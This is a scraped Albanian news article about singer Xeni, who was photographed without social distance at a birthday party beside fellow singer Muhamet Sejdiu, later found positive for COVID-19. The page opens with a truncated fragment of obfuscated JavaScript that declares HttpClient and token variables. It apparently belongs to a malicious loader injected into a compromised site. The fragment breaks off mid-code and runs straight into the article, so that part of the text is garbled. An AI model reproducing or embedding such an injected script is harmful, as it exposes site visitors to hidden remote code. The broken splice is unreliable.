;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

A rrezikon Xeni? Dalin fotot pa distancën e nevojshme me kolegun pozitiv me COVID-19

By

Mbrëmjen që lamë pas, fillimisht nga mediat u bë e ditur se këngëtari i muzikës popullore Muhamet Sejdiu dhe bashkëshortja e tij janë çifti nga Gjakova të cilët rezultuan pozitiv me coronavirus.

Sejdiu kishte rreth 10 ditë prej kur ishte kthyer nga Gjermania, atje ku performoi me rastin e 8 Marsit.

Por, netët live ai duket të mos i ketë ndalur as pas kthimit nga Gjermania, në mungesë të simptomave gjatë ditëve të inkubimit të virusit në organizëm.

Sejdiu ka qenë pjesë edhe e një ahengu familjar bashkë me këngëtarin Shkëlzen Jetishi – Xeni.

Ky i fundit, në disa foto nga pjesëmarrësit e ahengut shfaqet tejet afër me kolegun e tij gjatë këndimit duke ngritur shqetësim për rrezikun eventual që mund të ketë këngëtari nga Gjakova për infektim nga virusi.

Si për ironi, në disa prej fotove të postuar ku shfaqet turma gjatë këndimit të Xenit dhe Muhamet Sejdiut, personat e pranishëm në ditëlindje kanë zgjedhur të ironizojnë me virusin duke thënë se ndeja është ‘kundër coronavirus’, pa e ditur se të paktën njëri prej tyre vetëm se ishte tashmë bartës i COVID-19.

Ndryshe, në të njejtin aheng ka qenë pjesëmarrës edhe Kryetari i Gjilanit, Lutfi Haziri por ky i fundit në fotografi nuk shihet pa distancën e nevojshme, ndryshe nga Xeni. /Prive.al

Artikuj të ngjashëm